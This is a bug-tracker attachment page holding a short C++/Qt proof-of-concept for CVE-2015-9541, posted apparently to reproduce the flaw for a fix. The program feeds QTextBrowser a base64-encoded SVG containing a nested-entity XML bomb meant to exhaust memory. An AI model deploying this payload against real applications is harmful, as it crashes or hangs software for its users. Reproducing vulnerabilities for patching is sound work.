Attachment 11611 Details for Bug 26554 – A possible PoC for the CVE-2015-9541 issue

A possible PoC for the CVE-2015-9541 issue

example.cpp (text/x-csrc), 1.38 KB, created by Len Lawrence on 2020-04-29 00:43:04 CEST

(hide)

Description:

Filename:

MIME Type:

Creator: Len Lawrence

Created: 2020-04-29 00:43:04 CEST

Size: 1.38 KB

patch

obsolete

>#include <QtGui>
>
>int main(int argc,char** argv)
>{
>    QApplication app(argc,argv);
>    QTextBrowser* browser = new QTextBrowser();
>    QString message="<img src=\"data:image/png;base64,PD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSB4IFsKPCFFTlRJVFkgYSAieG8iPgo8IUVOVElUWSBiICImYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsiPgo8IUVOVElUWSBjICImYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsiPgo8IUVOVElUWSBkICImYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsiPgo8IUVOVElUWSBlICImZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsiPgo8IUVOVElUWSBmICImZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsiPgo8IUVOVElUWSBnICImZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsiPgo8IUVOVElUWSBoICImZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsiPgo8IUVOVElUWSBpICImaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsiPgo8IUVOVElUWSBqICImaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsiPgo8IUVOVElUWSBrICImajsmajsmajsmajsmajsmajsmajsmajsmajsmajsmajsmajsmajsmajsmajsmajsiPgpdPgo8c3ZnPgo8Y2lyY2xlIHI9IjEiPjwvY2lyY2xlPgo8dGV4dD4mazs8L3RleHQ+Cjwvc3ZnPg==\" />";
>    browser->setFixedSize(500,500);    
>    browser->setWindowTitle("QTextBrowser XML bomb inside SVG"); //you will most likely never see this ;)
>    browser->append(message);
>    browser->show();    
>    
>    return app.exec();
>}

#include <QtGui>

int main(int argc,char** argv)
{
    QApplication app(argc,argv);
    QTextBrowser* browser = new QTextBrowser();
    QString message="<img src=\"data:image/png;base64,PD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSB4IFsKPCFFTlRJVFkgYSAieG8iPgo8IUVOVElUWSBiICImYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsmYTsiPgo8IUVOVElUWSBjICImYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsmYjsiPgo8IUVOVElUWSBkICImYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsmYzsiPgo8IUVOVElUWSBlICImZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsmZDsiPgo8IUVOVElUWSBmICImZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsmZTsiPgo8IUVOVElUWSBnICImZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsmZjsiPgo8IUVOVElUWSBoICImZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsmZzsiPgo8IUVOVElUWSBpICImaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsmaDsiPgo8IUVOVElUWSBqICImaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsmaTsiPgo8IUVOVElUWSBrICImajsmajsmajsmajsmajsmajsmajsmajsmajsmajsmajsmajsmajsmajsmajsmajsiPgpdPgo8c3ZnPgo8Y2lyY2xlIHI9IjEiPjwvY2lyY2xlPgo8dGV4dD4mazs8L3RleHQ+Cjwvc3ZnPg==\" />";
    browser->setFixedSize(500,500);    
    browser->setWindowTitle("QTextBrowser XML bomb inside SVG"); //you will most likely never see this ;)
    browser->append(message);
    browser->show();    
    
    return app.exec();
}

Actions: View

Attachments on bug 26554: 11611